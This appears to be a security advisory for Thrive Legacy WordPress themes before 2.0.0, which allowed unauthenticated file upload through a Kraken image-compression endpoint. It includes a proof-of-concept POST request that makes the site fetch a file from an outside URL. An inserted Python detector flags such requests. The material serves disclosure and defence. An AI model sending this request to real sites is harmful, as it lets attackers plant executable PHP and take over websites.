All Thrive Themes Legacy Themes < 2.0.0 - Unauthenticated Arbitrary File Upload and Option Deletion

Description

Thrive “Legacy” themes register a REST API endpoint that compresses images through the Kraken image optimization engine. By sending a crafted request to this endpoint, combined with data planted through the separate Option Update vulnerability, it was possible to make the site retrieve malicious code from a remote URL and either overwrite an existing file with it or create a new one. This includes executable PHP files containing malicious code.

Proof of Concept

POST /wp-json/thrive/kraken HTTP/1.1
Host: [URL]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 104

{"id":"td_optin_webhook","results":{"http:\/\/key":{"kraked_url":"https:\/\/ramgall.com\/license.txt"}}}
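As an added defensive example (not part of the advisory), the following Python checks a captured request against the pattern described above: an unauthenticated call to the kraken endpoint whose `kraked_url` points outside the optimizer's host or at a non-image file. The request dictionary shape, the `dl.kraken.io` allowlist and the `authenticated` flag are assumptions for illustration; the first sample body is the PoC payload shown above.

```python
import json
import os
from urllib.parse import urlparse

# Constructed sample requests: the first body is the advisory's own PoC payload, the
# second an assumed benign shape (the theme's real callback format is not on this page).
SAMPLE_REQUESTS = [
    {"path": "/wp-json/thrive/kraken", "authenticated": False,
     "body": r'{"id":"td_optin_webhook","results":{"http:\/\/key":{"kraked_url":"https:\/\/ramgall.com\/license.txt"}}}'},
    {"path": "/wp-json/thrive/kraken", "authenticated": True,
     "body": r'{"id":"hero_image","results":{"https:\/\/site.example\/hero.jpg":{"kraked_url":"https:\/\/dl.kraken.io\/api\/abc\/hero.jpg"}}}'},
]

IMAGE_EXTENSIONS = {".jpg", ".jpeg", ".png", ".gif", ".webp"}
# Hypothetical allowlist of hosts an optimized image is expected to come back from.
ALLOWED_HOSTS = {"dl.kraken.io"}

def suspicious_reasons(req):
    """Return the reasons a thrive/kraken request matches this advisory's abuse pattern."""
    reasons = []
    if not req["path"].startswith("/wp-json/thrive/kraken"):
        return reasons  # not the endpoint this check is about
    if not req.get("authenticated"):
        reasons.append("unauthenticated call to the kraken endpoint")
    try:
        body = json.loads(req["body"])
    except ValueError:
        return reasons + ["body is not valid JSON"]
    results = body.get("results") if isinstance(body, dict) else None
    if not isinstance(results, dict):
        return reasons + ["results is not an object"]
    for entry in results.values():
        url = entry.get("kraked_url", "") if isinstance(entry, dict) else ""
        parsed = urlparse(url)
        # The fetched content is written to disk, so both source host and file type matter.
        if parsed.scheme not in ("http", "https") or parsed.hostname not in ALLOWED_HOSTS:
            reasons.append(f"kraked_url host not allowlisted: {parsed.hostname}")
        if os.path.splitext(parsed.path)[1].lower() not in IMAGE_EXTENSIONS:
            reasons.append(f"kraked_url does not name an image file: {parsed.path}")
    return reasons


def scan(requests):
    """Map the index of every flagged request to its reasons."""
    flagged = {}
    for i, req in enumerate(requests):
        reasons = suspicious_reasons(req)
        if reasons:
            flagged[i] = reasons
    return flagged
```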

Affects Themes

Fixed in 2.0.0

Miscellaneous

Original Researcher
Chloe Chamberland, Ram Gall, Charles Sweethill
Submitter
Chloe Chamberland, Ram Gall, Charles Sweethill
Verified
Yes

Timeline

Publicly Published
2021-03-24
Added
2021-03-24
Last Updated
2021-03-31
